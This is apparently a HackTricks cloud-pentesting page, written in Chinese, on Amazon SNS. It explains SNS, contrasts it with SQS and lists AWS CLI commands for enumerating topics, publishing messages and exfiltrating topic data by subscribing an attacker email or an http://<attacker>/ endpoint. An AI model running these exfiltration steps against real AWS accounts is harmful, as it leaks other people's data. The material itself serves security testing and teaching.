AWS - SNS Enum

学习与实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 分享黑客技巧。

SNS

亚马逊简单通知服务 (Amazon SNS) 被描述为一个 完全托管的消息服务。它支持 应用程序到应用程序 (A2A) 和 应用程序到个人 (A2P) 的通信类型。

A2A 通信的关键特性包括 发布/订阅 (pub/sub) 机制。这些机制引入了主题，对于实现高吞吐量的 推送式多对多消息传递至关重要。此功能在涉及分布式系统、微服务和事件驱动的无服务器架构的场景中非常有利。通过利用这些主题，发布系统可以有效地将消息分发到 广泛的订阅系统，促进扇出消息模式。

与 SQS 的区别

SQS 是一个 基于队列 的服务，允许点对点通信，确保消息由 单个消费者 处理。它提供 至少一次交付，支持标准和 FIFO 队列，并允许消息保留以进行重试和延迟处理。另一方面，SNS 是一个 基于发布/订阅的服务，通过同时向 多个订阅者 广播消息来实现 一对多 通信。它支持 各种订阅端点，如电子邮件、短信、Lambda 函数和 HTTP/HTTPS，并提供针对性消息传递的过滤机制。虽然这两项服务都能实现分布式系统中组件之间的解耦，但 SQS 侧重于排队通信，而 SNS 强调事件驱动的扇出通信模式。

枚举

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>